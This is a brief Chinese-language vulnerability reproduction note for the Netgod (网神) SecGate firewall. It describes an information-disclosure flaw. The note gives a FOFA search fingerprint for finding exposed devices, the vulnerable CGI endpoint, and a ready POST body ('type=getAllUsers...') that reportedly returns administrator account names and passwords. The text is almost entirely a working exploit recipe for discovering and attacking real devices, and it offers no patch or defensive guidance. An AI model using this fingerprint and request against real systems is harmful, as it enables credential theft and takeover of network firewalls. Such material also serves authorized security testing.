简介
网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击。
该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。
漏洞复现
FOFA语法:
body="sec_gate_image/login_02.gif"
访问界面如下所示:
POC:
/cgi-bin/authUser/authManageSet.cgi
进行GET请求访问页面返回为空证明该文件存在可尝试进行测试
POST请求:
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc